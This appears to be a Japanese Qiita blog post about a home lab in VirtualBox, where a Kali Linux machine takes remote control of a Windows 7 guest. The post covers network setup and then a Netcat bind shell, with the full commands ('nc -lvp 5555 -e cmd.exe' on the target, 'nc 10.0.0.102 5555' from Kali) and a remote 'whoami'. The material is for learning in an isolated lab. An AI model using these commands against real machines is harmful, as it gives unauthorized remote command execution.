1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

More than 1 year has passed since last update.

VirtualBox上でサイバー攻撃を実装してみた

Last updated at Posted at 2022-05-09

<攻撃前の準備>

攻撃をする前に、ゲストOS,ホストOSを接続できる状態にします。

①virtualboxで、攻撃用サーバー(Kalilinux)とターゲット用サーバー(Windows7)を立てる

②仮想マシンのネットワーク設定を以下のように設定する。

Kalilinux:アダプタ1→NATアダプタ 
      アダプタ2→ホストオンリーネットワークアダプタ

Windows7 : アダプタ1→ホストオンリーネットワークアダプタ

③ゲストOSとゲストOS、ゲストOSとホストOSの接続を確認する
(ifconfig+ping)

④ pingが通らない場合は、ファイアウォール設定を確認する
(ホスト・ゲストともにwindows側でICMP Echo要求を有効化する)

<ターゲット端末を遠隔操作する(by Netcat)>

ここからは、実際の攻撃を行います。
WindowsにNetcatがインストールされている前提で話を進めます。

① Netcatでwindowsへ接続する

Kaliでterminalを起動して、windowsへ接続します。

root@kali:~ nc 10.0.0.102 5555

windows側でnetstatコマンドを実行すると、KaliのIPアドレスとポート番号が表示されます。
また、接続状態(state)はestablishedとなります。

②Kaliとwindowsでデータをやり取りする

kali側のterminalで以下のように実行すると

root@kali:~# nc 10.0.0.102 5555
hello

windows側のterminalで

hello

と表示されます

③ 以上を用いてバインドシェル(攻撃端末からターゲット端末に接続するシェル)を行います。

(1)Windows側で実行されるシェルを指定する

C:|Work|nc111nt>nc/exe -lvp 5555 -e cmd.exe
listening on [any] 5555

(2)kaliからwindowsへアクセスする

root@kali:~# nc 10.0.0.102 5555

(3)遠隔操作でコマンドを実行する

コマンドプロンプトの表示内容がKaliのterminalに表示されます。
例えば、

C:\Work\nc111nt>whoami
whoami
ie8win7\ieuser

のように、kali側で入力したコマンド(上の例ではwhoami)がエコーされて表示されますが、そのあとにコマンドの出力結果が表示されます。

この時点で、Kali側がwindows側を遠隔操作出来ています。

1
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
1
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?